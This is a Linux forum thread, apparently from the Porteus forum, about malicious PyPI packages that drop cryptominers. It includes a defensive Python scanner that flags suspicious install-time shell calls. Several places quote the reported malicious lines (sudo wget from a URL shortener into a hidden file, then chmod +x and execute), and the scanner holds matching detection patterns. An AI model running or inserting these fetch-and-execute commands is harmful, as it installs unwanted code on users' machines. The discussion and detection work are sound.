Is PyPI something to look out for in Porteus?

Karmi
Samurai
Posts: 162
Joined: 03 Apr 2022, 19:46
Distribution: Linux
Location: Old Town, Florida USA

Is PyPI something to look out for in Porteus?

Post#1 by Karmi » 20 Aug 2022, 01:52

Just reading the '241 npm and PyPI packages caught dropping Linux cryptominers' article and wondered...

User avatar
ncmprhnsbl
DEV Team
Posts: 3924
Joined: 20 Mar 2012, 03:42
Distribution: v5.0-64bit
Location: australia

Is PyPI something to look out for in Porteus?

Post#2 by ncmprhnsbl » 20 Aug 2022, 02:29

the fact that they (bogus packages with cryptominer scripts) were discovered is a good thing .. perhaps there'll be more oversight now..
this, though:

os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")
os.system("chmod +x .cmc >/dev/null 2>&1")
os.system("./.cmc >/dev/null 2>&1")
would (should) prompt for a password, which should alert the user to something being off..
also, looking at the bash script shown, it looks like it creates a 'service' and calls 'systemctl' which is a systemd command that porteus doesn't have..

more generally, any package from any source on the web should be treated with caution..
Forum Rules : https://forum.porteus.org/viewtopic.php?f=35&t=44
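The point above is that the snippet's behaviour (sudo, a download from a URL shortener, chmod +x on a hidden dotfile, output sent to /dev/null) is visible in the package source before anything runs. As an added example, not code from this thread, the article it cites, or the Porteus project, here is a small triage script that parses a package's setup.py with Python's ast module, never executes it, and reports shell calls whose command text carries those indicators. The indicator list and both sample setup.py strings are constructed for the example; the "malicious" sample reuses the three defanged lines quoted above, and the "benign" sample shows a legitimate build-time shell call that should not be flagged.

```python
import ast
import re

# Patterns a reviewer would flag in install-time code. Constructed for this example:
# illustrative, not exhaustive, and some legitimate build scripts will trip one or two,
# so a hit is a prompt to read the code, not a verdict.
INDICATORS = {
    "privilege_escalation": re.compile(r"\bsudo\b"),
    "remote_download": re.compile(r"\b(wget|curl)\s"),
    "url_shortener": re.compile(r"bit\[?\.\]?ly|tinyurl\.com|t\.co/"),
    "make_executable": re.compile(r"\bchmod\s+(\+x|[0-7]*7[0-7]*)\b"),
    "hidden_file": re.compile(r"(^|[\s/])\.[A-Za-z0-9_]+"),
    "output_suppressed": re.compile(r">\s*/dev/null"),
    "persistence": re.compile(r"\bsystemctl\b|\bcrontab\b|/etc/systemd/"),
}

# Calls that hand a string to a shell or exec a program.
SHELL_CALLS = {
    ("os", "system"), ("os", "popen"),
    ("subprocess", "run"), ("subprocess", "call"), ("subprocess", "check_call"),
    ("subprocess", "check_output"), ("subprocess", "Popen"),
}


def _call_name(call):
    """Return ('module', 'func') for calls of the form module.func(...), else None."""
    func = call.func
    if isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
        return (func.value.id, func.attr)
    return None


def _command_strings(call):
    """Collect literal command text from a call: plain strings and argv lists."""
    commands = []
    for arg in call.args:
        if isinstance(arg, ast.Constant) and isinstance(arg.value, str):
            commands.append(arg.value)
        elif isinstance(arg, (ast.List, ast.Tuple)):
            parts = [e.value for e in arg.elts
                     if isinstance(e, ast.Constant) and isinstance(e.value, str)]
            if parts:
                commands.append(" ".join(parts))
    return commands


def scan_source(source):
    """Parse Python source (without running it) and report shell calls that match indicators."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        name = _call_name(node)
        if name not in SHELL_CALLS:
            continue
        for command in _command_strings(node):
            hits = sorted(k for k, rx in INDICATORS.items() if rx.search(command))
            if hits:
                findings.append({"line": node.lineno, "call": ".".join(name),
                                 "command": command, "indicators": hits})
    return sorted(findings, key=lambda f: f["line"])


def distinct_indicators(findings):
    """Set of indicator names seen across all findings, sorted for stable output."""
    return sorted({ind for f in findings for ind in f["indicators"]})


# Constructed sample: a setup.py wrapping the three defanged lines quoted in the thread.
MALICIOUS_SETUP = (
    "import os\n"
    "from setuptools import setup\n"
    'os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")\n'
    'os.system("chmod +x .cmc >/dev/null 2>&1")\n'
    'os.system("./.cmc >/dev/null 2>&1")\n'
    'setup(name="example-pkg")\n'
)

# Constructed sample: a legitimate build-time shell call that should produce no findings.
BENIGN_SETUP = (
    "import subprocess\n"
    "from setuptools import setup\n"
    'version = subprocess.check_output(["git", "describe", "--tags"]).decode().strip()\n'
    'setup(name="example-pkg", version=version)\n'
)


if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_SETUP), ("benign", BENIGN_SETUP)):
        found = scan_source(src)
        print(f"{label}: {len(found)} suspicious call(s); indicators: {distinct_indicators(found)}")
        for f in found:
            print(f"  line {f['line']} {f['call']}: {f['command']}  <- {f['indicators']}")
```

To use it on a real package, fetch the source distribution without installing it (for example `pip download --no-deps --no-binary :all: <package>`), unpack it, and feed setup.py (and any module imported at install time) to scan_source. Because the script only parses, it is safe to run on untrusted code; the trade-off is that it cannot see commands that are built at runtime from obfuscated strings, so an empty result is not a clean bill of health.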

Karmi
Samurai
Posts: 162
Joined: 03 Apr 2022, 19:46
Distribution: Linux
Location: Old Town, Florida USA

Is PyPI something to look out for in Porteus?

Post#3 by Karmi » 20 Aug 2022, 08:56

ncmprhnsbl wrote:
20 Aug 2022, 02:29
the fact that they (bogus packages with cryptominer scripts) were discovered is a good thing .. perhaps there'll be more oversight now..
this, though:

os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")
os.system("chmod +x .cmc >/dev/null 2>&1")
os.system("./.cmc >/dev/null 2>&1")
would (should) prompt for a password, which should alert the user to something being off..
also, looking at the bash script shown, it looks like it creates a 'service' and calls 'systemctl' which is a systemd command that porteus doesn't have..

more generally, any package from any source on the web should be treated with caution..
OK...thanks!
